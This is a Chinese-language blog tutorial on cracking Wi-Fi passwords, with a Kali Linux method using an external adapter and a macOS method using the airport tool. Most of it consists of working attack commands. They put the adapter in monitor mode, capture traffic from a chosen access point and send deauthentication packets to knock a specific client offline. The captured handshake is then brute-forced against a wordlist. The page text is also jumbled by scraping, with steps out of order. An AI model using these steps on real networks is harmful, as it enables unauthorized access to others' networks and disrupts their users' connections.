https://space.bilibili.com/29903122
本文只是提供一个思路,目的是为了提升学习渗透的兴趣,禁止用于非法操作,否则后果自负!!!当然现在已经2021年了,谁还破WiFi,但是为了近源渗透,所以在这又来老生常谈了一次,这里使用了Kali和外置网卡以及mac破解Wi-Fi的方法。视频教程链接地址:
复制 01 外置网卡版 1.准备工作 首先你得有一个外置网卡,然后用虚拟机进行破解 所需要的设备:kali linux 外置网卡 要将虚拟机设置为:桥接模式 将插入的外接网卡设置为:ifconfig看下:
airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill
airmon-ng start wlan0
airodump-ng wlan0mon
airodump-ng -c 6 --bssid 88:25:93:60:C0:D9 -w A4-3062.4G wlan0mon(保存文件名称)
-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名 wlan0mon 启用混杂模式的网卡名
2.开始攻击 将wlan0网卡开启混杂模式 复制 开始抓包: 首先,查看附近WiFi热点,使用命令 复制 选取其中信号较好的WiFi热点,在这里我们选取一个目标(A4-306 2.4G) 使用airodump-ng对选取的WiFi热点进行cap监听与获取:
aireplay-ng -0 2 -c E8:4E:06:21:75:D7 -a 88:25:93:60:C0:D9 wlanmon
-0 death模式
2为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC
复制 这个时候看到有12个设备进行了连接,选取一个为75-D7的进行抓包:(需要一直开启) 使用aireplay-ng 对选取的WiFi热点进行cap监听与获取:(再启动一个命令行) 复制 有时候一次抓不到,多试几次,我试了三次之后,抓到了:
#首先ls查看当前目录所产生的握手包 aircrack-ng -w rockyou.txt A4-3062.4G-02.cap
-w代表字典 接着你的包名称
这个时候监听就可以停止了。 3. 跑包 我们直接使用kali自带的,在文件目录中,需要解压(这里不做演示) 复制 然后就等结果吧!(其实如果wifi密码复杂的话,基本上很难跑出来) 这个只是一个笔记,现在暴力破解的太难了,wifi密码稍微一复杂,基本就无望。 4. 2019年11月更新 现在使用kali自带的aircrack好像已经过时了,我在网上看到有更好、能跑GPU的工具了,具体的名字忘了,大家可以自行搜索,另外很多人再问我的无线网卡的型号,我的记得就30左右,不用买太好的,一般的就行:
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
最重要的还是字典问题,当然还有一种破解的方法是对pin包检测,但是那种方法只适合更老的路由器设备,现在的路由器基本上都可以防pin了,所以在这里就不再演示了。 02 macos版本方案 mac自带了airport工具 2.1 使用ariport
airport -s
airport en0 sniff 1 # 1代表信道
aircrack-ng airportSniffkZzYWr.cap
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap
复制 2.2 发现附近Wi-Fi 复制 2.3 侦听数据 复制 此时Wi-Fi图标发现改变 一段时间后手动结束侦听,这里是为了抓到握手包 2.4 分析流量 复制 其中可以看到4-401已经抓到了握手包 2.5 aircrack破解
参考链接:https://blog.csdn.net/qq_39498701/article/details/104262468